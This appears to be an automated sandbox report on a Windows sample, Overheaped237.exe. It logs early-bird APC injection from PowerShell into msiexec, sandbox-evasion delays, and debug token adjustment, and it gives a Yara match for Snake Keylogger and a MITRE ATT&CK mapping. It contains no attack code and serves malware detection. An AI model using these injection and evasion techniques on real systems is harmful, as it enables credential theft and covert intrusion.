Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2060287042.0000000004F48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2060287042.0000000004F48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000002.00000002.2060287042.0000000004F48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000007.00000002.2667128224.000000000930A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2667128224.0000000009376000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000007.00000002.2667128224.0000000009376000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\Overheaped237.exe

API call chain: ExitProcess graph end node

graph_0-3488

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 44E0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe

0_2_0040322B

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
